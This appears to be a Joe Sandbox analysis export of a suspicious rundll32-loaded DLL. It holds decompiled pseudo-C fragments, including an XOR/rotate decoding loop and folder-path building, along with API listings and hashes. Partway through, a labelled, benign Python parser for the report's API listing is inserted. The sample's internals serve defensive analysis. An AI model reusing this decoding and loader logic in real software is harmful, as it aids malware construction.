                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocErrorLastVirtual
                                                  • String ID:
                                                  • API String ID: 497505419-0
                                                  • Opcode ID: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                                  • Instruction ID: ea269a028a1356371e25c0c3e3ed4ebc626b70e9dbdbba68532a1a5be3ab6bd4
                                                  • Opcode Fuzzy Hash: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                                  • Instruction Fuzzy Hash: C831047270464886F697DF19A8007EC7760F74DBD4F28C224FE4A47799CE28CA4B8B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 30%
                                                  			E000000011800014B4(unsigned long long __rax, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
                                                  				signed int _t18;
                                                  				unsigned long long _t40;
                                                  				signed long long _t44;
                                                  				void* _t48;
                                                  				intOrPtr* _t53;
                                                  				void* _t57;
                                                  				char* _t65;
                                                  
                                                  				_t40 = __rax;
                                                  				_a8 = __rbx;
                                                  				_a16 = __rbp;
                                                  				_a24 = __rsi;
                                                  				_t18 =  *__rdx & 0x0000ffff;
                                                  				_t57 = __rcx;
                                                  				if (_t18 == 0) goto 0x800014f1;
                                                  				 *(__rcx - __rdx + __rdx) = _t18;
                                                  				_t44 = __rbx + 1;
                                                  				if ((__rdx[1] & 0x0000ffff) != 0) goto 0x800014dd;
                                                  				_t48 = __r8;
                                                  				E00000001180001604(__rax, _t44, __r8, __rcx);
                                                  				_t53 =  !=  ? _t40 : "error";
                                                  				if ( *_t53 == 0) goto 0x80001543;
                                                  				_t65 = "0123456789ABCDEF";
                                                  				 *((short*)(_t57 + _t44 * 2)) =  *((char*)((_t40 >> 4) + _t65));
                                                  				 *((short*)(_t57 + 2 + _t44 * 2)) =  *((char*)(_t48 + _t65));
                                                  				if ( *((intOrPtr*)(_t53 + 1)) != 0) goto 0x80001517;
                                                  				 *((short*)(_t57 + (_t44 + 2) * 2)) = 0;
                                                  				if (_t40 == 0) goto 0x80001560;
                                                  				GetProcessHeap();
                                                  				return HeapFree(??, ??, ??);
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID: 0123456789ABCDEF$error
                                                  • API String ID: 3859560861-2801526254
                                                  • Opcode ID: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                                  • Instruction ID: 4d37b50957ecb40c11f1bab49c43fdea11f128f3efa604fbc2492665c83ce860
                                                  • Opcode Fuzzy Hash: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                                  • Instruction Fuzzy Hash: 1011B1A6600BC8C5EB92DF51A8103EA77B0EB4CBC5F489165FBC947765EE2CC659C300
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocByteCharMultiProcessWidelstrlen
                                                  • String ID:
                                                  • API String ID: 1639946962-0
                                                  • Opcode ID: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                                  • Instruction ID: f749ba44300ed36f526ff8a462cf25b5487c4517239f32e4156c9a8f9373c5fc
                                                  • Opcode Fuzzy Hash: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                                  • Instruction Fuzzy Hash: A101A772505B8982E791CF11F80439AB7A1F78CBD4F088224EB5917798DF3CC6088744
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                                  • Instruction ID: 9806a40fc76e7d2c0d57f827516f40d69531b25457ee03bdfc89f6e60ed63076
                                                  • Opcode Fuzzy Hash: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                                  • Instruction Fuzzy Hash: 99518B72A00B548AEB56CF21E5007DC77B1F70CBE9F088215EE6927B88DF34D6468310
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E00000001180002268(void* __ecx, void* __edx, long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r11, long long __r14) {
                                                  				void* _v8;
                                                  				char _v872;
                                                  				signed int _v904;
                                                  				signed int _v912;
                                                  				long long _v920;
                                                  				long long _v928;
                                                  				long long _v936;
                                                  				void* __rbp;
                                                  				void* _t101;
                                                  				long long _t104;
                                                  				intOrPtr _t109;
                                                  				void* _t112;
                                                  				signed long long _t115;
                                                  				long long _t118;
                                                  				long long _t119;
                                                  				signed int _t120;
                                                  				signed long long _t121;
                                                  				long long _t124;
                                                  				intOrPtr _t125;
                                                  				void* _t128;
                                                  				void* _t131;
                                                  				void* _t132;
                                                  				signed long long _t135;
                                                  
                                                  				_t115 = __rdx;
                                                  				_t101 = _t131;
                                                  				 *((long long*)(_t101 + 8)) = __rbx;
                                                  				 *((long long*)(_t101 + 0x10)) = __rsi;
                                                  				 *((long long*)(_t101 + 0x18)) = __rdi;
                                                  				 *((long long*)(_t101 + 0x20)) = __r14;
                                                  				_t132 = _t131 - 0x3c0;
                                                  				r14d =  *((intOrPtr*)(__rcx + 2));
                                                  				_t124 = __rcx + 0x2c6;
                                                  				E00000001180001F2C(__rbx, __rcx, __rdx, __rdi, _t124, _t101 - 0x2c8, __r8,  &_v872);
                                                  				_v912 = _v912 & 0x00000000;
                                                  				_t118 = __r14 - 0x10;
                                                  				_t112 = _t118 + _t124;
                                                  				_v936 = _t124;
                                                  				_v920 = _t118;
                                                  				_v928 = _t124;
                                                  				if (_t112 == 0) goto 0x800022e4;
                                                  				asm("movups xmm0, [ecx]");
                                                  				_t104 = _t112 - __r14 - _t124;
                                                  				asm("movups [esp+eax+0x50], xmm0");
                                                  				_t119 = _v920;
                                                  				_t125 = _v936;
                                                  				r10d = 0;
                                                  				if (_t125 == 0) goto 0x800023f3;
                                                  				if (_t119 - 4 < 0) goto 0x800023f3;
                                                  				_t120 = _t119 + 0xfffffffc;
                                                  				_v920 = _t120;
                                                  				if (_v928 != 0) goto 0x8000233e;
                                                  				if (_t120 == 0) goto 0x800023f3;
                                                  				GetProcessHeap();
                                                  				_t135 = _t120 + 1;
                                                  				HeapAlloc(_t128, ??);
                                                  				_v928 = _t104;
                                                  				if (_t104 == 0) goto 0x800023f3;
                                                  				r10d = 1;
                                                  				r9d =  *(_t120 + _t125);
                                                  				r11d = 0;
                                                  				r9d = r9d ^ _v904;
                                                  				_v912 = _t120;
                                                  				if (_t120 == 0) goto 0x800023b6;
                                                  				r8d = _t115 + 1;
                                                  				r8d = r8d & 0x00000003;
                                                  				 *(__r11 + _t104) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) +  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) ^  *(__r11 + _t125);
                                                  				asm("ror eax, cl");
                                                  				 *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) + 1;
                                                  				asm("ror eax, cl");
                                                  				 *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) + 1;
                                                  				_t109 = _v928;
                                                  				if (__r11 + 1 - _v920 >= 0) goto 0x800023b1;
                                                  				goto 0x80002354;
                                                  				_t121 = _v912;
                                                  				if (_t121 == 0) goto 0x800023d0;
                                                  				asm("rol ecx, 0x3");
                                                  				if (_t115 + 1 - _t121 < 0) goto 0x800023bf;
                                                  				if (r9d == 0 + ( *(_t115 + _t109) & 0x000000ff)) goto 0x80002415;
                                                  				if (r10d == 0) goto 0x800023f3;
                                                  				if (_t109 == 0) goto 0x800023f3;
                                                  				GetProcessHeap();
                                                  				HeapFree(??, ??, ??);
                                                  				return 0x4000000;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
                                                    • Part of subcall function 0000000180001F2C: SHGetFolderPathA.SHELL32 ref: 0000000180001F79
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F8D
                                                    • Part of subcall function 0000000180001F2C: lstrcatA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FA8
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FD4
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FEE
                                                  • GetProcessHeap.KERNEL32 ref: 0000000180002311
                                                  • HeapAlloc.KERNEL32 ref: 0000000180002321
                                                  • GetProcessHeap.KERNEL32 ref: 00000001800023DF
                                                  • HeapFree.KERNEL32 ref: 00000001800023ED
                                                    • Part of subcall function 0000000180002B5C: VirtualAlloc.KERNEL32 ref: 0000000180002B85
                                                    • Part of subcall function 0000000180002B5C: GetLastError.KERNEL32 ref: 0000000180002B95
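The bullets above are Joe Sandbox's flattened export of the Win32 calls reached from this function: four direct calls (the GetProcessHeap/HeapAlloc ... GetProcessHeap/HeapFree pair) plus the calls made inside the two subcalls at 0x180001F2C (path construction with SHGetFolderPathA and lstrcat/lstrcpy) and 0x180002B5C (VirtualAlloc). As an added example that is not part of the report or of Joe Sandbox's own tooling, the Python below parses those bullets into structured records so the call sites, their callee functions and the direct call sequence can be checked programmatically across many exported reports. The regular expression, the `ApiRef`/`ApiSummary` types and the helper names are this example's own; the sample text is copied from the bullets above.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# One bullet of the Joe Sandbox "APIs" listing, e.g.
#   • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
#   • GetProcessHeap.KERNEL32 ref: 0000000180002311
# The pattern is this example's own reading of the export format.
API_LINE_RE = re.compile(
    r"^\s*[•*-]\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{16}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{16})\s*$"
)


@dataclass
class ApiRef:
    api: str                 # API name, e.g. HeapAlloc
    module: str              # exporting module, upper-cased, e.g. KERNEL32
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee function address when the call is reached via a subcall, else None
    args: List[str] = field(default_factory=list)  # argument values as shown; "?" means unresolved


@dataclass
class ApiSummary:
    direct: List[ApiRef]                 # calls made by the function itself
    by_subcall: Dict[int, List[ApiRef]]  # calls grouped by the subcall function they belong to
    modules: Set[str]                    # every module touched


def parse_api_section(text: str) -> List[ApiRef]:
    """Turn the flattened APIs bullets into ApiRef records; non-matching lines are skipped."""
    refs: List[ApiRef] = []
    for line in text.splitlines():
        m = API_LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        refs.append(ApiRef(
            api=m.group("api"),
            module=m.group("module").upper(),
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None,
            args=args,
        ))
    return refs


def summarize(refs: List[ApiRef]) -> ApiSummary:
    direct = [r for r in refs if r.subcall is None]
    by_subcall: Dict[int, List[ApiRef]] = {}
    for r in refs:
        if r.subcall is not None:
            by_subcall.setdefault(r.subcall, []).append(r)
    return ApiSummary(direct, by_subcall, {r.module for r in refs})


def direct_call_sequence(refs: List[ApiRef]) -> List[str]:
    """API names of the function's own calls, ordered by call-site address."""
    return [r.api for r in sorted((r for r in refs if r.subcall is None), key=lambda r: r.ref)]


def contains_sequence(seq: List[str], pattern: List[str]) -> bool:
    """True if `pattern` occurs as a contiguous run inside `seq` (e.g. GetProcessHeap then HeapAlloc)."""
    n = len(pattern)
    return any(seq[i:i + n] == pattern for i in range(len(seq) - n + 1))


# Copied from the report bullets above.
REPORT_EXCERPT = """
• Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
• Part of subcall function 0000000180001F2C: SHGetFolderPathA.SHELL32 ref: 0000000180001F79
• Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F8D
• Part of subcall function 0000000180001F2C: lstrcatA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FA8
• Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FD4
• Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FEE
• GetProcessHeap.KERNEL32 ref: 0000000180002311
• HeapAlloc.KERNEL32 ref: 0000000180002321
• GetProcessHeap.KERNEL32 ref: 00000001800023DF
• HeapFree.KERNEL32 ref: 00000001800023ED
• Part of subcall function 0000000180002B5C: VirtualAlloc.KERNEL32 ref: 0000000180002B85
• Part of subcall function 0000000180002B5C: GetLastError.KERNEL32 ref: 0000000180002B95
"""

if __name__ == "__main__":
    parsed = parse_api_section(REPORT_EXCERPT)
    summary = summarize(parsed)
    print("direct:", direct_call_sequence(parsed))
    for func, calls in sorted(summary.by_subcall.items()):
        print(f"subcall {func:#x}:", [c.api for c in calls])
    print("modules:", sorted(summary.modules))
```

Parsing the export this way lets the same check run over every function page of a report: grouping by `subcall` recovers the call-graph edges the flat listing hides, and `direct_call_sequence` gives the ordered call-site view needed to confirm a GetProcessHeap/HeapAlloc pair rather than just the presence of the two names.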
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heaplstrcpy$AllocProcess$ErrorFolderFreeLastPathVirtuallstrcat
                                                  • String ID:
                                                  • API String ID: 2105669568-0
                                                  • Opcode ID: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                                  • Instruction ID: 886363a85c85b8c133f3364473ad3588f921292bdc20cd3c907036740f45d7b5
                                                  • Opcode Fuzzy Hash: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                                  • Instruction Fuzzy Hash: 3351D172614B8486EA96CF14E10479DB3A1F78CBC4F188221EB9957B88DF39D74AC700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%